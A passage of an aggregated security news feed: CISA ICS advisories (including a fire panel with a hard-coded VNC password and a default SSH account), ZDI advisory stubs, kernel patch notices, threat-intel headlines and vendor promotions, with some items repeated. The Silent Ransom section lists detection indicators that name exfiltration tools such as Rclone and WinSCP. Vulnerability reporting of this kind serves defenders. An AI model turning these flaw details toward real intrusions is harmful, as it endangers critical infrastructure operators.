packets. Airbus Security first reported the vulnerability, and Siemens recommends updating to version V2.95.3.18 or newer to mitigate the issue. Consilium Safety CS5000 Fire Panel (ICSA-25-148-03) CISA also reported two critical vulnerabilities in the Consilium CS5000 Fire Panel, which is used in commercial, energy, healthcare, and transportation facilities. Vulnerabilities: Initialization with Insecure Defaults (CWE-1188) – CVE-2025-41438 Use of Hard-Coded Credentials (CWE-798) – CVE-2025-46352 CVSS v4 Score for both: 9.3 The CS5000 contains a default SSH-enabled account with elevated permissions and a hard-coded VNC password visible within the binary itself. These backdoors allow attackers to remotely control or disable the fire panel. Reported by Andrew Tierney of Pen Test Partners, these vulnerabilities currently have no fixes. Users are urged to upgrade to post-July 2024 fire panels or implement compensating controls like strict physical access. Instantel Micromate (ICSA-25-148-04) Used in vibration monitoring across critical manufacturing, Micromate devices by Instantel are vulnerable due to a lack of authentication on a configuration port. Vulnerability: Missing Authentication for Critical Function (CWE-306) CVE: CVE-2025-1907 CVSS v4 Score: 9.3 An attacker could remotely send commands to the device without any credentials. Instantel is working on a firmware update and advises users to restrict IP access and monitor device exposure in the meantime. Santesoft Sante DICOM Viewer Pro (ICSMA-25-148-01) In the healthcare domain, Sante DICOM Viewer Pro, a diagnostic imaging tool, contains a memory corruption flaw. Vulnerability: Out-of-Bounds Read (CWE-125) CVE: CVE-2025-5307 CVSS v4 Score: 8.4 Researcher Michael Heinzl reported that if a local attacker successfully exploits this vulnerability, it could lead to information disclosure or arbitrary code execution. Santesoft has released an updated version (v14.2.2) to address the issue. Mitigation and Recommendations CISA recommends the following proactive security measures to reduce risk and improve resilience across industrial and healthcare environments: Conduct comprehensive risk assessments before applying any mitigation strategies to understand system impact and exposure. Minimize internet exposure of industrial control systems (ICS) and medical devices to prevent unauthorized access. Segment control networks from corporate or business networks to limit lateral movement in case of compromise. Implement Zero Trust access principles to ensure strict verification at every access point, regardless of user location or device. Regularly update software and firmware across all ICS, medical, and networked systems to patch known vulnerabilities. Conclusion The latest ICS advisories reinforce a sobering reality: vulnerabilities in control systems like Siemens SiPass, Consilium’s fire panels, and Instantel’s monitoring tools could lead to business disruption and financial loss. As attackers continue to exploit weak spots in critical infrastructure, the need for smarter, faster vulnerability management is more urgent than ever. Cyble empowers organizations with advanced, AI-driven intelligence to mitigate zero-day threats, prioritize patching based on real-world risk, and protect both IT and ICS environments. By combining vulnerability data, dark web insights, exploit intelligence, and asset context into a unified platform, Cyble helps security teams act faster, reduce attack surfaces, and prevent breaches before they occur. See Cyble in action — request a DEMO today. References: https://www.cisa.gov/news-events/alerts/2025/05/29/cisa-releases-five-industrial-control-systems-advisories https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-01 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-02 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-03 https://www.cisa.gov/news-events/ics-advisories/icsa-25-148-04 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-25-148-01 The post CISA Issues Advisories Highlighting Siemens SiPass and Other Critical Vulnerabilities targeting ICS systems appeared first on Cyble.

Disclosure at MainStreet Bancshares comes as American finance orgs beg for looser reporting requirements Community bank MainStreet Bancshares says thieves stole data belonging to some of its customers during an attack on a third-party provider.

Sophos Firewall is once again pioneering new innovations.

New innovations and top-requested features

Sigma rules have become the security team equivalent of LEGO bricks and systems. With LEGO, people can build whatever they can imagine by connecting different types of bricks. With Sigma Specification 2.0 rules, security teams can create vendor-agnostic detections without being limited by proprietary log formats.   In response to the Sigma rules’ popularity, the […] The post Sigma Specification 2.0: What You Need to Know appeared first on Graylog.

Cisco Secure Workload serves as a foundational solution for organizations seeking to implement an effective microsegmentation strategy.

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco, Nutanix, and Pure Storage redefine infrastructure with adaptable solutions, enabling best-in-class tech deployment and seamless, silo-free operations.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

New Cisco research shows 93% of business leaders and 89% of Canadians agree that the future of innovation in this country rests with business.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Cisco, Nutanix, and Pure Storage redefine infrastructure with adaptable solutions, enabling best-in-class tech deployment and seamless, silo-free operations.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

Victoria’s Secret took down its United States website after a security incident.

If this had been a security drill, someone would’ve said it went too far. But it wasn’t a drill—it was real. The access? Everything looked normal. The tools? Easy to find. The detection? Came too late. This is how attacks happen now—quiet, convincing, and fast. Defenders aren’t just chasing hackers anymore—they’re struggling to trust what their systems are telling them. The problem isn’t too...

Cisco Talos said it has uncovered malware disguised as a lead monetization platform and a ChatGPT installer

Innovation continues for SAP Business Network, with several new capabilities announced at SAP Sapphire.

2 July 2025, 10:30 - 11:15Join us for an exclusive live webinar, where Paul Gower and Esben Mogensen will explore how Network Detection and Response (NDR) can elevate your cybersecurity detection capabilities. Learn how integrating NDR with your existing Logpoint SIEM can provide unparalleled network visibility, detect sophisticated threats, and accelerate response times. Our security [...] The post Boosting Threat Detection with NDR and Logpoint SIEM appeared first on Logpoint.

The evolution of cyber threats has forced organizations across all industries to rethink their security strategies. As attackers become more sophisticated — leveraging encryption, living-off-the-land techniques, and lateral movement to evade traditional defenses — security teams are finding more threats wreaking havoc before they can be detected. Even after an attack has been identified, it can...

Summary From January to April 2025, Netskope Threat Labs tracked a three-fold increase in traffic to phishing pages created on the Glitch platform. These phishing campaigns have affected more than 830 organizations and over 3,000 users since January 2025, primarily targeting Navy Federal Credit Union members and seeking sensitive information. Still, they also go after […] The post Glitch-hosted Phishing Uses Telegram & Fake CAPTCHAs to Target Navy Federal Credit Union Customers appeared first on Netskope.

Security researchers have uncovered several critical vulnerabilities in applications preloaded on Ulefone and Krüger&Matz Android smartphones. These flaws, reported by CERT Polska and discovered by Szymon Chadam, expose users to significant risks, including potential data theft and device manipulation by malicious applications. In specific, third party app installed on the same device could by misusing […] The post Security Issues Found in preinstalled apps on Android Smartphones first appeared on Mobile Hacker.

Do you have online accounts you haven't used in years? If so, a bit of digital spring cleaning might be in order.

Riigi Infosüsteemi Amet (RIA) viib koostöös NATO Küberkaitsekoostöö Keskuse (CCDCOE) ja CR14-ga läbi Eesti elektrivõrgu spetsialistide küberkaitsealast koolitamist.

Perimeter-Based File Type Verification, Simplified Troubleshooting, and Enhanced Monitoring for High-Performance Environments

Cybersecurity researchers have warned of a new spear-phishing campaign that uses a legitimate remote access tool called Netbird to target Chief Financial Officers (CFOs) and financial executives at banks, energy companies, insurers, and investment firms across Europe, Africa, Canada, the Middle East, and South Asia.  "In what appears to be a multi-stage phishing operation, the attackers...

A CVSS score 8.2 AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H severity vulnerability discovered by 'Do Manh Dung & Nguyen Dang Nguyen of STAR Labs SG Pte. Ltd.' was reported to the affected vendor on: 2025-06-02, 4 days ago. The vendor is given until 2025-09-30 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public advisory.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37089.

This vulnerability allows remote attackers to initiate arbitrary server-side requests on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 5.3. The following CVEs are assigned: CVE-2025-37090.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37091.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37092.

This vulnerability allows remote attackers to bypass authentication on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Authentication is not required to exploit this vulnerability. The ZDI has assigned a CVSS rating of 9.8. The following CVEs are assigned: CVE-2025-37093.

This vulnerability allows remote attackers to delete arbitrary files on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 5.5. The following CVEs are assigned: CVE-2025-37094.

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 4.9. The following CVEs are assigned: CVE-2025-37095.

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Hewlett Packard Enterprise StoreOnce VSA. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The ZDI has assigned a CVSS rating of 7.2. The following CVEs are assigned: CVE-2025-37096.

This vulnerability allows local attackers to escalate privileges on affected installations of SolarWinds DameWare Mini Remote Control Service. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-26396.

In such a large industry, manufacturing risks can come from threat actors as well as well-meaning employees who make a mistake.

Multiple vulnerabilities were identified in Ubuntu Linux Kernel. An attacker could exploit some of these vulnerabilities to trigger security restriction bypass, denial of service condition, elevation of privilege, remote code execution, sensitive information disclosure and data manipulation on the targeted system.   Note: ... Impact Denial of Service Elevation of Privilege Remote Code Execution Information Disclosure Data Manipulation Security Restriction Bypass System / Technologies affected Ubuntu 16.04 LTS Ubuntu 18.04 LTS Ubuntu 20.04 LTS Ubuntu 22.04 LTS Ubuntu 24.04 LTS Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://ubuntu.com/security/notices/LSN-0112-1 https://ubuntu.com/security/notices/USN-7510-8 https://ubuntu.com/security/notices/USN-7513-5 https://ubuntu.com/security/notices/USN-7516-7 https://ubuntu.com/security/notices/USN-7516-8 https://ubuntu.com/security/notices/USN-7516-9 https://ubuntu.com/security/notices/USN-7550-1 https://ubuntu.com/security/notices/USN-7550-2 https://ubuntu.com/security/notices/USN-7550-3

Multiple vulnerabilities were identified in SUSE Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, sensitive information disclosure and security restriction bypass on the targeted system. Impact Denial of Service Information Disclosure Security Restriction Bypass System / Technologies affected SUSE Linux Micro 6.0 SUSE Linux Micro Extras 6.0 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://www.suse.com/support/update/announcement/2025/suse-su-202520339-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520340-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520341-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520342-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520343-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520344-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520349-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520350-1/ https://www.suse.com/support/update/announcement/2025/suse-su-202520351-1/

Multiple vulnerabilities were identified in Debian Linux Kernel. A remote attacker could exploit some of these vulnerabilities to trigger denial of service condition, elevation of privilege and sensitive information disclosure on the targeted system. Impact Elevation of Privilege Information Disclosure Denial of Service System / Technologies affected Debian bulleye versions prior to 6.1.137-1~deb11u1 Solutions Before installation of the software, please visit the vendor web-site for more details.   Apply fixes issued by the vendor: https://lists.debian.org/debian-lts-announce/2025/05/msg00045.html

PLUS: Ransomware gang using tech support scam; Czechia accuses China of infrastructure attack; And more! Infosec In Brief  Despite last week’s FBI announcement that it helped to take down the crew behind the Lumma infostealer, the malware continues to operate.

Une vulnérabilité a été découverte dans les produits Moxa. Elle permet à un attaquant de provoquer un déni de service à distance.

Une vulnérabilité a été découverte dans Roundcube Roundcube Webmail. Elle permet à un attaquant de provoquer une exécution de code arbitraire à distance.

Une vulnérabilité a été découverte dans les produits Synology. Elle permet à un attaquant de provoquer un contournement de la politique de sécurité.

Ce bulletin d'actualité du CERT-FR revient sur les vulnérabilités significatives de la semaine passée pour souligner leurs criticités. Il ne remplace pas l'analyse de l'ensemble des avis et alertes publiés par le CERT-FR dans le cadre d'une analyse de risques pour prioriser l'application des...

Vectra AI leads the Gartner® Magic Quadrant™ for NDR—ranked highest in Execution and Vision. Discover why security teams choose Vectra AI.

[ This is a lightly edited internal post we’ve made public.] Last week we had booths at DevConf Joburg, and DevConf Cape Town. They’re two ZA events run by the same crew with the same speakers, two days and 1400kms apart. The organisers set a bar in ZA for putting on polished and well-run events. Where the average event is in an old venue with limited food and chaotic organisation, DevConf is punctual, classy, and efficient. Francois & Victor (Jhb), and Leighton & Daniel (Cpt) joined me in the two events, and we spent the time demo’ing Canary, and talking about Thinkst. We don’t expect to make sales from DevConf; the audience isn’t security, and they almost universally aren’t buyers. Any sales we get are bonuses. The reason we sponsor is not because we’re spendthrifts either. Through the year we get requests to sponsor events, podcasts, publications, software, education, meetups, do co-branding, write (or accept) guest blog posts, and more. We usually decline. For DevConf, our participation stands on two legs: supporting a developer community, and introducing (and maintaining) a public presence for future hiring. We do that mainly through 1-on-1 conversations with folks who walk up to the booth and, typically, start […]

Building, Sustaining, and Scaling Job Quality within CDFIs is the second panel from this event. For highlights from this discussion, subscribe to EOP’s YouTube channel. Or subscribe to our podcast to listen on the go. The post (Recording) Building, Sustaining, and Scaling Job Quality within CDFIs appeared first on The Aspen Institute.

BSA names Vi­ta­ly Ni­ko­lae­vich Kovalev is "Stern," the leader of Trickbot.

'It's a high-stakes intelligence war,' analyst explains exclusive  A mystery whistleblower calling himself GangExposed has exposed key figures behind the Conti and Trickbot ransomware crews, publishing a trove of internal files and naming names.

Two information disclosure flaws have been identified in apport and systemd-coredump, the core dump handlers in Ubuntu, Red Hat Enterprise Linux, and Fedora, according to the Qualys Threat Research Unit (TRU). Tracked as CVE-2025-5054 and CVE-2025-4598, both vulnerabilities are race condition bugs that could enable a local attacker to obtain access to access sensitive information. Tools like...

On April 16, 2025, a critical vulnerability in the Erlang/OTP SSH server was disclosed. This vulnerability could allow an unauthenticated, remote attacker to perform remote code execution (RCE) on an affected device. The vulnerability is due to a flaw in the handling of SSH messages during the authentication phase. For a description of this vulnerability, see the Erlang announcement. This advisory will be updated as additional information becomes available. This advisory is available at the following link:https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-erlang-otp-ssh-xyZZy Security Impact Rating: Critical CVE: CVE-2025-32433

A multinational law enforcement operation has resulted in the takedown of an online cybercrime syndicate that offered services to threat actors to ensure that their malicious software stayed undetected from security software. To that effect, the U.S. Department of Justice (DoJ) said it seized four domains and their associated server facilitated the crypting service on May 27, 2025, in...

May 30, 2025Ravie LakshmananVulnerability / Threat Intelligence The China-linked threat actor behind the recent in-the-wild exploitation of a critical security flaw in SAP NetWeaver has been attributed to a broader set of attacks targeting organizations in Brazil, India, and Southeast Asia since 2023. “The threat actor mainly targets the SQL injection vulnerabilities discovered on web […]

A "highly active" Chinese threat group is taking proverbial candy from babies, exploiting known bugs in exposed servers to steal data from organizations in sensitive sectors.

Join session leaders Daniel Ziv from Verint and Radu Cristea of Avaya, as they lead a discussion on how proven strategies and solutions can drive significantly improved outcomes. The post Turning Turbulence into Triumph Ways to Empower Your Agents appeared first on Verint.

Pen tester on ScreenConnect bug: This one ‘terrifies’ me ConnectWise has brought in the big guns to investigate a "sophisticated nation state actor" that broke into its IT environment and then breached some of its customers.

The US Treasury said cryptocurrency investment schemes like the ones facilitated by Funnull Technology Inc. have cost Americans billions of dollars annually.

Plus: An Iranian man pleads guilty to a Baltimore ransomware attack, Russia’s nuclear blueprints get leaked, a Texas sheriff uses license plate readers to track a woman who got an abortion, and more.

28-year-old alleged to have made multiple drops to folks who turned out to be undercover FBI agents A Defense Intelligence Agency (DIA) IT specialist is scheduled to appear in court today after being caught by the FBI trying to surreptitiously drop top secret information to a foreign government in a public park.

Defense Secretary Pete Hegseth's newest directive for the department zeroes in on providers of “system IT integration, implementation, or advisory services."

Nathan Vilas Laatsch was allegedly disgruntled by the Trump administration and willing to share sensitive data with the foreign country. The FBI set up a dead drop operation to intercept the classified materials.

Cash splashed on damages, infrastructure improvements, and fraud monitoring A Seattle cancer facility has agreed to fork out around $52.5 million as part of a class action settlement linked to a Thanksgiving 2023 cyberattack where criminals directly threatened cancer patients with swat attacks.

The US Treasury Dept sanctioned and the FBI issued an advisory warning against Chinese-based FUNNULL CDN, labeling it a major distributor of online scams. The post U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator appeared first on Silent Push.

The US Treasury Dept sanctioned and the FBI issued an advisory warning against Chinese-based FUNNULL CDN, labeling it a major distributor of online scams. The post U.S. Treasury Sanctions FUNNULL CDN, FBI Issues Advisory Warning Against Major Cyber Scam Facilitator appeared first on Silent Push.

Several Senate Democrats called on Homeland Security Secretary Kristi Noem to reestablish the Cyber Safety Review Board (CSRB) so it could continue looking into China-linked hacks.

The board — which was dismissed at the start of the Trump administration — has been viewed as a well-intentioned but imperfect tool for reviewing significant cybersecurity events.

Giving people the power to build community and bring the world closer together so we can shoot them Meta has partnered with Anduril Industries to build augmented and virtual reality devices for the military, eight years after it fired the defense firm's founder, Palmer Luckey.

The landmark trial between WhatsApp and NSO Group unearthed several new revelations.

The post Chainalysis: OFAC Sanctions Funnull Technology Inc. for Supporting Pig Butchering Scams appeared first on Silent Push.

Driving Innovation in Small Business Lending (Examples of How Small Business and CDFIs are Working Together to Advance Job Quality). For highlights from this discussion, subscribe to EOP’s YouTube channel. Or subscribe to our podcast to listen on the go. The post (Recording) How Small Businesses and CDFIs are Working Together to Advance Job Quality appeared first on The Aspen Institute.

Sharpen your skills, test out new tools, and connect with people who build like you. The post GitHub Universe 2025: Here’s what’s in store at this year’s developer wonderland appeared first on The GitHub Blog.

Danielle Weddepohl, Director of Public Safety and Emergency Management at George Brown College, discusses how to promote wellness among security teams.

Tabletop exercises are just the start Running a tabletop or simulated incident is a critical step in building preparedness. It […]

The post TechCrunch: US government sanctions tech company involved in cyber scams appeared first on Silent Push.

Hackers reportedly accessed Wiles' phone contacts, which were used to impersonate her.

A 28-year-old civilian IT worker at the Defense Intelligence Agency has been arrested in Northern Virginia on suspicion that he leaked secrets to a foreign government.

On May 30, 2025, HPE published a security advisory to address vulnerabilities in the following product: HPE OneView – versions prior to v10.00

CERT Polska has received a report about 3 vulnerabilities (from CVE-2024-13915 to CVE-2024-13917) found in applications preloaded on Ulefone and Krüger&Matz smartphones.

This role now stands as a pivotal figure in organizational strategy and security posture

These intelligent systems, capable of independent decision-making and learning, are transforming how organisations detect, respond to, and manage security problems

Part 2 of 2: This step-by-step guide will make SSO easy–and more secure

A new malware campaign is distributing a novel Rust-based information stealer dubbed EDDIESTEALER using the popular ClickFix social engineering tactic initiated via fake CAPTCHA verification pages. "This campaign leverages deceptive CAPTCHA verification pages that trick users into executing a malicious PowerShell script, which ultimately deploys the infostealer, harvesting sensitive data such as...

At RSA Conference 2025, we surveyed more than 70 cybersecurity professionals, asking some critical questions about their threat detection and incident response (TDIR) process. These weren’t random attendees. Every respondent was a vetted practitioner actively involved in TDIR, working directly within incident response...

The latest report from Meta on social media influence operations tracked some low-impact campaigns to China, Iran and Romania.

AI tools shook up development. Now, product security must change too.

Security leaders discuss the Serviceaide data leak, which impacted around 500,000 Catholic Health patients.

Today we are thrilled to announce that Netskope has once again been named a Leader in the Gartner® Magic Quadrant™  for Security Service Edge (SSE). This is the fourth year in a row Netskope has been recognized as a Leader, and we have been recognized as a Leader every time since the inaugural 2022 Magic […] The post SSE Leader. Again. Why Netskope Keeps Hitting the Mark. appeared first on Netskope.

Apex will enhance Tenable's AI Aware tool by mitigating the threats of AI applications and tools not governed by organizations, while enforcing existing security policies.

The rate of compensation gains has slowed from the COVID years, and budgets remain largely static due to economic fears, but CISOs are increasingly gaining executive status and responsibilities.

The elusive boss of the Trickbot and Conti cybercriminal groups has been known only as “Stern.” Now, German law enforcement has published his alleged identity—and it’s a familiar face.

​Keeping your firewall policies compliant isn’t just about checking a box — it’s about keeping your internal network secure, your data protected, and your business running smoothly. Think of your...

The UK’s Ministry of Defence has revealed that it was the target of a sophisticated cyber attack that saw Russia-linked hackers pose as journalists. Read more in my article on the Hot for Security blog.

Robbinhood operator pleads guilty, PumaBot hits IoT via SSH brute-force attacks, and DragonForce expands RMM exploits via an affiliate model.

Check out the 25 new pieces of training content added in May, alongside the always fresh content update highlights, new features and events.

?What does innovation mean to you?? Read how one marketer answered that question after attending the 2025 Akamai Innovation Tour.

GigaOm COO joins inaugural episode of Commvault’s new compliance podcast. The post The Evolution of Compliance and the Future of Cybersecurity appeared first on Commvault - English - United States.

Check out ETSI’s new global standard for securing AI systems and models. Plus, learn how CISOs and their teams add significant value to orgs’ major initiatives. In addition, discover what webinar attendees told Tenable about their cloud security challenges. And get the latest on properly decommissioning tech products; a cyber threat targeting law firms; and more!Dive into six things that are top of mind for the week ending May 30.1 - ETSI publishes global standard for AI securityWhat is the proper way to secure your artificial intelligence models and systems? Are you confused by all the different AI security recommendations and guidance? The European Telecommunications Standards Institute (ETSI) is trying to bring clarity to this issue.ETSI, in collaboration with the U.K. National Cyber Security Center (NCSC) and the U.K. Department for Science, Innovation & Technology (DSIT), has published a global standard for AI security designed to cover the full lifecycle of an AI system.Aimed at developers, vendors, operators, integrators, buyers and other AI stakeholders, ETSI’s “Securing Artificial Intelligence (SAI); Baseline Cyber Security Requirements for AI Models and Systems” technical specification outlines a set of foundational security principles for an AI system’s entire lifecycle.Here's an overview of the five stages of an AI system and the 13 security principles that must be adopted:Secure design stageRaise awareness about AI security threats and risks.Design the AI system not only for security but also for functionality and performance.Evaluate the threats and manage the risks to the AI system.Make it possible for humans to oversee AI systems.Secure development stageIdentify, track and protect the assets.Secure the infrastructure.Secure the supply chain.Document data, models and prompts.Conduct appropriate testing and evaluation.Secure deployment stageCommunication and processes associated with end-user and affected entities.Secure maintenance stageMaintain regular security updates, patches and mitigations.Monitor system behavior.Secure end-of-life stageEnsure proper data and model disposal. Each one of the 13 security principles is further broken down into multiple provisions that detail more granular requirements. For example, in the secure maintenance stage, ETSI calls for developers to test and evaluate major AI system updates as they would a new version of an AI model. Also in this stage, system operators need to analyze system and user logs to detect security issues such as anomalies and breaches.The 73-page companion technical report, “Securing Artificial Intelligence (SAI): Guide to Cyber Security for AI Models and Systems,” offers significantly more technical detail about each provision. Together the technical specification and the technical report “provide stakeholders in the AI supply chain with a robust set of baseline security requirements that help protect AI systems from evolving cyber threats,” reads an NCSC blog.For more information about AI security, check out these Tenable resources:“Harden Your Cloud Security Posture by Protecting Your Cloud Data and AI Resources” (blog)“Tenable Cloud AI Risk Report 2025” (report)“Who's Afraid of AI Risk in Cloud Environments?” (blog)“Tenable Cloud AI Risk Report 2025: Helping You Build More Secure AI Models in the Cloud” (on-demand webinar)“Securing the AI Attack Surface: Separating the Unknown from the Well Understood” (blog)2 - Report: CISOs and cyber teams pump value into business projectsCybersecurity teams’ involvement in large-scale organizational initiatives yields significant monetary benefits – especially if CISOs are incorporated early into these efforts.That’s a key finding from Ernst & Young’s “2025 EY Global Cybersecurity Leadership Insights Study,” which surveyed 550 C-suite and cybersecurity leaders globally from organizations with more than $1 billion in annual revenue.Specifically, the study found that cybersecurity teams contribute a median of $36 million to every enterprise-wide initiative they’re involved in. That’s equivalent to between 11% and 20% of the value of each project.“CISOs who are involved early in cross-function decision-making generate more value than those who were consulted late or not at all,” the report reads. “CEOs, CFOs and boards should take steps to more meaningfully integrate cybersecurity into transformations and other strategic initiatives,” it adds. The finding points to how CISOs and their cybersecurity teams are expanding their scope from managing security, risk and compliance to becoming “key enablers of business growth.”Unfortunately, over the past two years, cybersecurity budgets have shrunk as a percentage of annual revenue, and only 13% of surveyed CISOs said they get looped in early into critical business decisions.Using a framework, the report concluded that cybersecurity adds considerable value to these six key types of initiatives:Adopting and building technologyStrengthening brand trust and reputationImproving customer experienceTransforming and innovating across the businessExpanding to new marketsDeveloping new products and servicesFor more information about how CISOs and their cyber teams add value to business ventures:“Better metrics can show how cybersecurity drives business success” (CSO)“Build CISO Strategic Impact and Visibility” (IANS Research)“Nearly half of CISOs now report to CEOs, showing their rising influence” (Help Net Security)“CISOs embrace rise in prominence — with broader business authority” (CSO)“How leading CISOs build business-critical cyber cultures” (CIO)3 - Tenable poll zooms in on cloud securityDuring our recent webinar “Confident in the Cloud: How to Overcome Complexity and Get AWS Security Right,” we asked attendees about their cloud security practices and challenges. Check out what they said.(137 webinar attendees polled by Tenable, May 2025)(60 webinar attendees polled by Tenable, May 2025)Interested in learning about proven best practices for how to control and secure your AWS environment? Watch this webinar on-demand!4 - Guide: How to safely decommission tech productsIt’s important to properly dispose of software and hardware products after removing them from your IT environment.To help organizations with this process, the U.K. National Cyber Security Centre (NCSC) has published guidance on how to securely retire obsolete technical wares.“Decommissioning can be highly expensive and complex, with potentially severe repercussions if not executed properly,” the NCSC document reads. “Outdated or unsupported assets can pose an unacceptable risk to the organisation.” For example, an improperly decommissioned IT product could allow unauthorized people to access confidential data and could be used to breach services and devices.The NCSC guidance, titled “Decommissioning assets,” addresses topics including:How to plan the decommissioning processHow to carry out the decommissioning of obsolete assetsWhat to do after the decommissioning process is completedFor more information about properly disposing of obsolete hardware and software:“How to Decommission IT Hardware” (Techbuyer)“Why end-of-life IT is ruining innovation and how to fix it” (OliverWyman)“Cybersecurity guidance: Obsolete products (Canadian Centre for Cyber Security)“The Top 5 Risks of Using Obsolete and Unsupported Software” (IT Convergence)“Managing the risks of legacy IT” (Australian Cyber Security Centre)5 - FBI warns law firms about Silent Ransom threatHacker group Silent Ransom is targeting law firms via phishing calls and emails aimed at tricking employees into granting it remote access to their computers. Once they gain remote access, the attackers steal confidential data and use it to extort the victims.So said the U.S. Federal Bureau of Investigation (FBI) in an alert titled “Silent Ransom Group Targeting Law Firms.”Silent Ransom, also known as Luna Moth, Chatty Spider and UNC3753, employs two different schemes:It emails its targets offering fake, inexpensive subscriptions, and when victims request that the subscription be cancelled, the attackers email them a link that downloads remote access software on their computers.A Silent Ransom attacker calls a law firm employee and, pretending to be a member of the IT department, asks the victim to join a remote access session.Detecting a Silent Ransom attack is difficult. Its hackers don’t leave behind traditional attack indicators because they use legitimate remote-access and systems-management tools. Thus, to spot a Silent Ransom breach, the FBI recommends looking for:New, unauthorized downloads of systems-management and remote-access toolsA WinSCP or Rclone connection made to an external IP addressAnonymous emails or calls claiming data was stolenEmails regarding how to cancel a subscription serviceUnsolicited calls from individuals claiming to work in the law firm’s IT departmentTo mitigate the threat, FBI recommendations include:Train staff on recognizing and resisting phishing attempts.Establish and relay policies for when and how your law firm’s IT department will reach out to employees and prove their identities.Regularly back up company data.Adopt multi-factor authentication for all employees.For more information about remote access attacks:“12 remote access security risks and how to prevent them” (TechTarget)“Guide to Securing Remote Access Software” (CISA)“Remote-access tools the intrusion point to blame for most ransomware attacks“ (Cybersecurity Dive)“Avoiding Ratting – Remote Access Trojans” (Get Safe Online)“RDP and Other Remote Login Attacks” (Ransomware.org)6 - New, updated CIS Benchmarks for Kubernetes, Microsoft and Red Hat productsThe Center for Internet Security has updated its CIS Benchmarks for Kubernetes, Azure Kubernetes Service and Microsoft Intune, and has released a new CIS Benchmark for Red Hat Enterprise Linux Security Technical Implementation Guide (STIG).These are the CIS Benchmarks updated in April:CIS Azure Kubernetes Service (AKS) Benchmark v1.7.0CIS Kubernetes Benchmark v1.11.1CIS Microsoft Intune for Windows 10 Benchmark v4.0.0CIS Microsoft Intune for Windows 11 Benchmark v4.0.0Meanwhile, the brand new Benchmark is CIS Red Hat Enterprise Linux 9 STIG Benchmark v1.0.0. Organizations can use the CIS Benchmarks’ secure-configuration guidelines to harden products against attacks. Currently, there are more than 100 Benchmarks for 25-plus vendor product families in categories including: cloud platformsdatabasesdesktop and server softwaremobile devicesoperating systemsTo get more details, read the CIS blog “CIS Benchmarks May 2025 Update.” For more information about the CIS Benchmarks list, check out its home page, as well as:“How to use CIS benchmarks to improve public cloud security” (TechTarget)“How to Unlock the Security Benefits of the CIS Benchmarks” (Tenable)“CIS Benchmarks Communities: Where configurations meet consensus” (HelpNet Security)“CIS Benchmarks: DevOps Guide to Hardening the Cloud” (DevOps)CIS Benchmarks

The software company, which specializes in remote IT management, said a "sophisticated nation state actor" was behind the attack but provided few details.

Thousands of devices have been compromised, claims GreyNoise

Russian internet service provider ASVT blamed widespread outages on a DDoS incident and attributed it to a pro-Ukraine collective.

This report contains statistics on vulnerabilities and published exploits, along with an analysis of the most noteworthy vulnerabilities we observed in the first quarter of 2025.

Learn how this amazing partnership integrates innovative technologies to enhance Italy's digital landscape and support the evolution of self-driving cars.More RSS Feeds: https://newsroom.cisco.com/c/r/newsroom/en/us/rss-feeds.html

On May 19th, Kettering Health experienced an unscheduled downtime for most of its IT applications. Security leaders share some of their thoughts on the recent cyberattack.

